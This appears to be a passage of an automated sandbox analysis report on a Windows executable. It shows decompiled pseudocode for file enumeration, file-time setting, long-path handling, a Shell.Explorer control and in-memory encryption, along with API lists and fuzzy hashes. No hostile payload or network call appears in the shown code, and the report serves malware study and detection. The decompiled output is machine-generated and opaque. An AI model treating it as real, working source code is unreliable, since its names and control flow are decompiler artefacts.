																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E001B5030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E001B9E2B);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t154);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															FindClose(_t214);
														}
														_t124 = _t202;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t221;
													return E001AE203(_t124, _v16 ^ _t221);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t191 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t150;
								} while (_t198 != _t150);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E001B7A50(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E001BDD80( *_t207,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t146;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t159 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E001BA1ED( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t147 = E001B7ECC();
					_t218 = 0x16;
					 *_t147 = _t218;
					E001B7DAB();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}

0x001b9e48
0x001b9e4b
0x001b9e51
0x001b9e69
0x001b9e6c
0x001b9e70
0x001b9e72
0x001b9e74
0x001b9e76
0x001b9e79
0x001b9e7c
0x001b9e7f
0x001b9e81
0x001b9ed9
0x001b9ed9
0x001b9edf
0x001b9ee1
0x001b9eec
0x001b9ef0
0x001b9ef2
0x001b9ef5
0x001b9ef9
0x001b9ef9
0x001b9efb
0x001b9efd
0x001b9eff
0x001b9f01
0x001b9f01
0x001b9f03
0x001b9f06
0x001b9f09
0x001b9f09
0x001b9f0b
0x001b9f0c
0x001b9f0c
0x001b9f17
0x001b9f19
0x001b9f1c
0x001b9f1d
0x001b9f20
0x001b9f20
0x001b9f24
0x001b9f27
0x001b9f2a
0x001b9f2a
0x001b9f38
0x001b9f3a
0x001b9f3d
0x001b9f3f
0x001b9f49
0x001b9f4c
0x001b9f4f
0x001b9f51
0x001b9f54
0x001b9f56
0x001b9fa6
0x001b9fa9
0x001b9fa9
0x001b9fab
0x00000000
0x001b9f58
0x001b9f5a
0x001b9f5a
0x001b9f5c
0x001b9f5f
0x001b9f5f
0x001b9f64
0x001b9f67
0x001b9f67
0x001b9f69
0x001b9f6a
0x001b9f6a
0x001b9f6e
0x001b9f71
0x001b9f71
0x001b9f74
0x001b9f77
0x001b9f84
0x001b9f89
0x001b9f8c
0x001b9f8e
0x001b9fc8
0x001b9fc9
0x001b9fca
0x001b9fcb
0x001b9fcc
0x001b9fcd
0x001b9fd2
0x001b9fd6
0x001b9fd8
0x001b9fd9
0x001b9fdc
0x001b9fdc
0x001b9fdf
0x001b9fdf
0x001b9fe1
0x001b9fe2
0x001b9fe2
0x001b9feb
0x001b9fec
0x001b9fef
0x001b9ff2
0x001b9ff5
0x001b9ff7
0x001b9ffe
0x001ba000
0x001ba003
0x001ba00d
0x001ba010
0x001ba011
0x001ba013
0x001ba027
0x001ba027
0x001ba02a
0x001ba034
0x001ba039
0x001ba03c
0x001ba03e
0x00000000
0x001ba040
0x001ba044
0x001ba04d
0x001ba053
0x00000000
0x001ba056
0x001ba015
0x001ba015
0x001ba01b
0x001ba020
0x001ba023
0x001ba025
0x001ba05c
0x001ba05e
0x001ba05f
0x001ba060
0x001ba061
0x001ba062
0x001ba063
0x001ba068
0x001ba06b
0x001ba06c
0x001ba06e
0x001ba074
0x001ba07b
0x001ba07e
0x001ba081
0x001ba082
0x001ba085
0x001ba086
0x001ba089
0x001ba08a
0x001ba0ab
0x001ba0ab
0x001ba0ad
0x00000000
0x00000000
0x001ba092
0x001ba094
0x001ba096
0x001ba098
0x001ba09a
0x001ba09c
0x001ba09e
0x001ba0a9
0x00000000
0x001ba0a9
0x001ba09e
0x001ba09a
0x00000000
0x001ba096
0x001ba0af
0x001ba0b1
0x001ba0b4
0x001ba0cd
0x001ba0cd
0x001ba0cf
0x001ba0d2
0x001ba0e2
0x001ba0e4
0x001ba0e4
0x001ba0d4
0x001ba0d4
0x001ba0d7
0x00000000
0x001ba0d9
0x001ba0d9
0x001ba0dc
0x00000000
0x001ba0de
0x001ba0de
0x001ba0de
0x001ba0dc
0x001ba0d7
0x001ba0f2
0x001ba0f6
0x001ba104
0x001ba109
0x001ba11e
0x001ba120
0x001ba126
0x001ba129
0x001ba15b
0x001ba15b
0x001ba160
0x001ba166
0x001ba166
0x001ba16d
0x001ba187
0x001ba187
0x001ba188
0x001ba18e
0x001ba194
0x001ba195
0x001ba196
0x001ba19b
0x001ba19e
0x001ba1a0
0x00000000
0x00000000
0x00000000
0x00000000
0x001ba16f
0x001ba16f
0x001ba175
0x001ba177
0x00000000
0x001ba179
0x001ba179
0x001ba17c
0x00000000
0x001ba17e
0x001ba17e
0x001ba185
0x00000000
0x00000000
0x00000000
0x00000000
0x001ba185
0x001ba17c
0x001ba177
0x00000000
0x001ba1a2
0x001ba1aa
0x001ba1b0
0x001ba1b2
0x001ba1b2
0x001ba1ba
0x001ba1bf
0x001ba1c7
0x001ba1ca
0x001ba1cc
0x001ba1e0
0x001ba1e5
0x001ba12b
0x001ba12b
0x001ba12c
0x001ba12d
0x001ba12e
0x001ba12f
0x001ba137
0x001ba137
0x001ba137
0x001ba139
0x001ba13c
0x001ba13f
0x001ba13f
0x001ba145
0x001ba0b6
0x001ba0b6
0x001ba0b9
0x001ba0bb
0x00000000
0x001ba0bd
0x001ba0bd
0x001ba0c0
0x001ba0c1
0x001ba0c2
0x001ba0c3
0x001ba0c8
0x001ba0bb
0x001ba147
0x001ba14c
0x001ba157
0x00000000
0x00000000
0x00000000
0x001ba025
0x001b9ff9
0x001b9ffb
0x001ba057
0x001ba05b
0x001ba05b
0x00000000
0x00000000
0x00000000
0x00000000
0x001b9f90
0x001b9f93
0x001b9f96
0x001b9f99
0x001b9f9c
0x001b9f9f
0x001b9fa2
0x001b9fa2
0x00000000
0x001b9f5f
0x001b9f41
0x001b9f41
0x001b9fad
0x001b9faf
0x00000000
0x001b9fb4
0x001b9e83
0x001b9e83
0x001b9e86
0x001b9e8f
0x001b9e92
0x001b9e99
0x001b9e9b
0x001b9eb4
0x001b9eb5
0x001b9eb6
0x001b9eb8
0x001b9ebd
0x001b9e9d
0x001b9e9d
0x001b9ea0
0x001b9ea1
0x001b9ea3
0x001b9ea5
0x001b9ea7
0x001b9eac
0x001b9eac
0x001b9ec0
0x001b9ec2
0x001b9ec4
0x00000000
0x00000000
0x001b9eca
0x001b9ecd
0x001b9ecf
0x001b9ed1
0x00000000
0x001b9ed3
0x001b9ed3
0x001b9ed6
0x00000000
0x001b9ed6
0x00000000
0x001b9ed1
0x001b9fb5
0x001b9fb8
0x001b9fbd
0x00000000
0x001b9fc0
0x001b9e53
0x001b9e53
0x001b9e5a
0x001b9e5b
0x001b9e5d
0x001b9e62
0x001b9fc1
0x001b9fc5
0x001b9fc5
0x00000000

APIs

_free.LIBCMT ref: 001B9FAF

Part of subcall function 001B7DBB: IsProcessorFeaturePresent.KERNEL32(00000017,001B7DAA,0000002C,001CA968,001BAF68,00000000,00000000,001B8599,?,?,001B7DB7,00000000,00000000,00000000,00000000,00000000), ref: 001B7DBD
Part of subcall function 001B7DBB: GetCurrentProcess.KERNEL32(C0000417,001CA968,0000002C,001B7AE8,00000016,001B8599), ref: 001B7DDF
Part of subcall function 001B7DBB: TerminateProcess.KERNEL32(00000000), ref: 001B7DE6

Strings

., xrefs: 001BA166
*?, xrefs: 001B9E86

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
Instruction ID: ba587f7ff8ca5e12303b51873279a1ac8656d8b3bef24f47ffea9cb5ee58641f
Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
Instruction Fuzzy Hash: F8518075E00209AFDF14DFA8C881AFDBBB5EF98320F24816DE954E7341E7359A028B50

Uniqueness

Uniqueness Score: -1.00%

Function 00197570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00197570(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E001AD870(E001C1298, _t108);
				E001AD940();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E0019FAB1(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00197773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E0019FA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E00196EF9(_t108 - 0x307c);
							_push(0);
							_t54 = E0019A1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E0019A12F(_t106, _t85 & 0xfffffffe);
							}
							E0019943C(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00199BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E0019399D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E001994DA(_t108 - 0x2034);
								}
							}
							E0019943C(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E00199768(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E0019A12F(_t106,  *(_t108 - 0x2074));
							E0019946E(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E0019943C(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E0019399D(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E0019946E(_t90);
					} else {
						E00196BF5(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E00196E03(0x1d00e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E0019FAB1(_t108 - 0x1010, 0x1c2490, 0x802);
					E0019FA89(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}

0x00197570
0x00197575
0x0019757f
0x00197586
0x0019758f
0x001975be
0x001975be
0x001975cc
0x001975d1
0x001975d1
0x001975e1
0x001975e6
0x001975ee
0x0019760d
0x00197611
0x0019764e
0x00197659
0x00197666
0x00197669
0x0019766e
0x00197674
0x00197677
0x0019767a
0x0019767c
0x00197681
0x00197681
0x0019768c
0x00197699
0x001976a7
0x001976ac
0x001976ae
0x001976b0
0x001976b9
0x001976ba
0x001976bb
0x001976c0
0x001976c2
0x001976ca
0x001976ca
0x001976c2
0x001976d5
0x001976da
0x001976de
0x001976e2
0x001976ed
0x001976f2
0x001976f4
0x00197711
0x00197711
0x001976f4
0x0019771e
0x00197729
0x0019772e
0x00197613
0x00197619
0x0019761e
0x00197628
0x00197629
0x0019762c
0x0019762f
0x00197634
0x00197634
0x00197734
0x001975f0
0x001975f7
0x00197603
0x00197603
0x0019773f
0x00197749
0x00197749
0x00197591
0x00197595
0x00000000
0x00197597
0x00197597
0x001975a9
0x001975b7
0x00000000
0x001975b7

APIs

__EH_prolog.LIBCMT ref: 00197575
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00197711

Part of subcall function 0019A12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A143
Part of subcall function 0019A12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A174

Strings

:, xrefs: 001975E6

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 1c3edd5e943ff0e1a792bfb66fdc95c0ab45847ddc17133b38c5dca8a657061b
Instruction ID: f94e4c24627ac15ace60cac8f29bd2e0b2cec72648c4c5c72439bba20fef2b0e
Opcode Fuzzy Hash: 1c3edd5e943ff0e1a792bfb66fdc95c0ab45847ddc17133b38c5dca8a657061b
Instruction Fuzzy Hash: 8241A171804118AAEF25EB64DD5AEEF777CAF65300F4040E9B605A3082DB749F89CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019B32C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0019B32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E001AD940();
				_t71 = _a4;
				if( *_t71 != 0) {
					E0019B4C6(_t71);
					_t66 = E001B2B33(_t71);
					_t30 = E0019B4F2(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E0019B5CD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E0019AEA5(__eflags,  &_v4100, 0x800);
							_t39 = E001B2B33( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E0019FAB1(_a8, L"\\\\?\\", _t69);
							E0019FA89(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E0019B5CD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E0019FA89(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E0019FAB1(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E0019FA89(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E0019B4C6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E0019FAB1(_a8, L"\\\\?\\", _t73);
						E0019FA89(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E0019FAB1(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x0019b334
0x0019b33a
0x0019b341
0x0019b34d
0x0019b35a
0x0019b35c
0x0019b361
0x0019b363
0x0019b3e9
0x0019b3ef
0x0019b3f1
0x0019b4b0
0x0019b4b0
0x0019b4b0
0x0019b4b2
0x00000000
0x0019b4b3
0x0019b3f7
0x0019b3f9
0x00000000
0x00000000
0x0019b408
0x0019b40a
0x0019b44f
0x0019b45b
0x0019b465
0x0019b469
0x0019b46b
0x00000000
0x00000000
0x0019b476
0x0019b486
0x0019b48b
0x0019b48f
0x0019b49b
0x0019b49d
0x0019b49f
0x0019b49f
0x0019b49f
0x0019b49d
0x0019b4a2
0x0019b4a2
0x0019b4a3
0x0019b4a3
0x0019b4a4
0x0019b4a4
0x0019b4a7
0x0019b4ac
0x00000000
0x0019b4ac
0x0019b40c
0x0019b40f
0x0019b412
0x0019b414
0x00000000
0x00000000
0x0019b423
0x0019b42a
0x0019b43c
0x00000000
0x0019b43c
0x0019b366
0x0019b36b
0x0019b36d
0x0019b395
0x0019b396
0x0019b399
0x00000000
0x00000000
0x0019b39f
0x0019b3a2
0x0019b3a5
0x00000000
0x00000000
0x0019b3ab
0x0019b3ae
0x0019b3b1
0x0019b3b3
0x00000000
0x00000000
0x0019b3c2
0x0019b3d0
0x0019b3d5
0x0019b3d6
0x00000000
0x0019b3d6
0x0019b36f
0x0019b372
0x0019b375
0x00000000
0x00000000
0x0019b386
0x0019b38b
0x00000000
0x0019b343
0x0019b343
0x0019b4b4
0x0019b4b8
0x0019b4b8

Strings

UNC, xrefs: 0019B3C8
\\?\, xrefs: 0019B37E, 0019B3BA, 0019B41B, 0019B46E

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 4b1c1213f1bc8af25da5b07af3a591f9bbf3fd877cbd2e121c7caab2a08ebf83
Instruction ID: c930c8fccbafe160f9f0e16c6478a3eb6e47307cb5d57f95dc3b84db9230d16e
Opcode Fuzzy Hash: 4b1c1213f1bc8af25da5b07af3a591f9bbf3fd877cbd2e121c7caab2a08ebf83
Instruction Fuzzy Hash: 6241F831404228BACF20AF61ED81EEF77ADBF25751F008469F95993142D774DE91EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A8A07, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E001A8A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E001AD82C(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E001A83B5(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E001A9184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E001A931D( *((intOrPtr*)(_t43 + 0xc)), 1);
					E001A92D3( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E001A9238( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E001A8581(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0x1c412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}

0x001a8a08
0x001a8a0d
0x001a8a11
0x001a8a14
0x001a8a19
0x001a8a20
0x001a8a2b
0x001a8a2b
0x001a8a22
0x001a8a24
0x001a8a24
0x001a8a2d
0x001a8a32
0x001a8abd
0x001a8a38
0x001a8a3a
0x001a8a45
0x001a8a4f
0x001a8a59
0x001a8a61
0x001a8a66
0x001a8a6a
0x001a8a8c
0x001a8a8e
0x001a8a91
0x001a8a95
0x001a8a9a
0x001a8a9d
0x001a8a9e
0x001a8a9f
0x001a8aa0
0x001a8aa3
0x001a8aa5
0x001a8aa6
0x001a8aa9
0x001a8ab0
0x001a8aab
0x001a8aab
0x001a8aab
0x001a8ab6
0x001a8ab6
0x001a8ab9
0x00000000
0x001a8aba
0x001a8a6e
0x001a8a6e
0x001a8a78
0x001a8a7f
0x001a8a84
0x00000000
0x00000000
0x001a8a86
0x00000000
0x001a8a86

APIs

new.LIBCMT ref: 001A8A14

Strings

Shell.Explorer, xrefs: 001A8A40
about:blank, xrefs: 001A8AB0

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 4f84cf3e6724d022facc53988e620bc1c046c4d7e23471205eab76fc91b9abc3
Instruction ID: 9ebf4d3affa8e8939207bdc55832ef74365552cc9e864ad638007695e7182247
Opcode Fuzzy Hash: 4f84cf3e6724d022facc53988e620bc1c046c4d7e23471205eab76fc91b9abc3
Instruction Fuzzy Hash: 16218E7A700616BFC705DFB4C895E26B7A8BF66310B08861AF5158B681DF70EC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019E862, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E0019E862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0x1d7358; // 0x0
				if(_t11 == 0) {
					E0019E7E3(0x1d7350);
					_t11 =  *0x1d7358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0x1d735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0x1d00e0);
							_t13 = E00196CC9(E001AE214(E00196CCE(_t22)), 0x1d00e0, 0x1d00e0, 2);
						}
					}
				}
				return _t13;
			}

0x0019e862
0x0019e862
0x0019e865
0x0019e86c
0x0019e873
0x0019e878
0x0019e878
0x0019e87e
0x0019e885
0x0019e88b
0x0019e892
0x0019e8c7
0x0019e8ce
0x00000000
0x0019e8d0
0x0019e8d5
0x0019e8d9
0x0019e8db
0x00000000
0x0019e8db
0x0019e8d9
0x0019e894
0x0019e896
0x0019e8e2
0x0019e8e2
0x0019e8e3
0x0019e8e9
0x0019e8eb
0x0019e8ef
0x0019e8f1
0x0019e8f2
0x0019e8f5
0x0019e8f8
0x0019e8fb
0x0019e8fe
0x0019e900
0x0019e901
0x0019e905
0x0019e898
0x0019e89d
0x0019e8a1
0x0019e8a3
0x0019e8a8
0x0019e8ad
0x0019e8c0
0x0019e8c0
0x0019e8a1
0x0019e896
0x0019e909

APIs

Part of subcall function 0019E7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0019E802
Part of subcall function 0019E7E3: GetProcAddress.KERNEL32(001D7350,CryptUnprotectMemory), ref: 0019E812

GetCurrentProcessId.KERNEL32(?,?,?,0019E85C), ref: 0019E8E3

Strings

CryptUnprotectMemory failed, xrefs: 0019E8DB
CryptProtectMemory failed, xrefs: 0019E8A3

Memory Dump Source

